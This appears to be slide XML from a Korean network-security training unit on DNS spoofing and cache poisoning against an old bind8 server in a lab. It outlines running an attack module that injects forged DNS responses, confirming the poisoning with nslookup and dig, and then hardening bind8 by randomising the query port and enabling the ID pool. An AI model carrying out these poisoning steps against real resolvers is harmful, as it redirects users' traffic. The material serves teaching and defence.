                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용한 패킷 캡처 시작 및 공격 실행</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run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11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 통해 공격 수행 과정 및 성공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공격 모듈에 의해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의가 공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버로 전송됨</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공격 모듈에 의해 다수의 가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답들이 주입됨</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공격 성공 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 공격 모듈에서 주입한 가짜 응답을 받아들임</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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2CB0AFE-FCF0-4204-9E35-5859167E8F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="807357" y="842130"/>
            <a:ext cx="3983101" cy="397637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA737117-F3F9-46DB-843B-A2E38DEE89ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586921" y="2035582"/>
            <a:ext cx="4808220" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA93EE2-D63D-4B70-8379-0A37D5E50E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="3764904"/>
            <a:ext cx="5400040" cy="2312924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F068D89E-FCCB-40A2-94DE-3F6F7FAFBF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248365" y="459434"/>
            <a:ext cx="5400040" cy="2312924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1D7EFE-14B4-41F0-A66D-15C3B834F394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248365" y="3074233"/>
            <a:ext cx="5400040" cy="3081782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256582293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12) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령어로 공격 성공 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>10.10.1.14</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a: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ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRP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및 오염시킨 호스트명 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3075A40A-4F63-4F40-A3AB-721CD56A4D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289877" y="1217687"/>
            <a:ext cx="3204083" cy="1208659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8BCBD3-B8EB-48B1-B0E8-42FEF5CCA089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2118999309"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="598914" y="2615860"/>
          <a:ext cx="5328158" cy="2442655"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2820359432"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="237436">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고</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3906924"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213508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칼리에서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지정하면 웹 브라우저를 통해 확인 가능</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8517656"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4097" name="_x762563712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32DD471-B532-4825-93E5-E7DEF111D6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676" y="3126920"/>
            <a:ext cx="5204633" cy="1834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0212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/Training/Unit/Net/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 11. DNS Spoofing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로컬 네트워크의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서버가 구형이라</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취약한 것으로 보고되고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보완하시오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 / test123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 DNS Cache Poisoning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Lubuntu</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EAF5DE74-F8E6-45FD-90D3-B942ECC721A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25763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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 파일 열기 편집</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>named.conf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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 변경</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5558273"/>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query-source port 33333; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>➡ 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버의 응답을 수신하는 포트를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 고정하지 않음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>         (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의별로 다른 포트 번호가 부여되는 것은 아니며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, bind8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 시작될 때 임의로 지정됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ use-id-pool true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    ➡ ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 순차적으로 증가시키는 대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>풀에서 임의의 값을 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</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killall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named</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4) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F084CBD-CD74-417C-9767-2BEDE009EB09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="701222" y="948266"/>
            <a:ext cx="2417953" cy="328041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624D5152-B9DF-49A2-83BE-4E3736A461D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581296" y="1743125"/>
            <a:ext cx="5340812" cy="4408583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D994BA32-A039-4139-A7DE-C27D679DD75B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1500058472"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317760" y="985035"/>
          <a:ext cx="5327904" cy="738759"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3303148218"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3403098023"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3514532794"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="234696">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>변경 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변경 후</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비고</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8118397"/>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query-source port 33333;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라인 삭제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1054174"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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use-id-pool false;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use-id-pool true;</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false → true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8078306"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C5D17E-4C78-4D00-B07E-529D5D47B33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375608" y="3862916"/>
            <a:ext cx="1782826" cy="284226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9A3D7B-A7D5-484E-8CA8-FD5787240D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
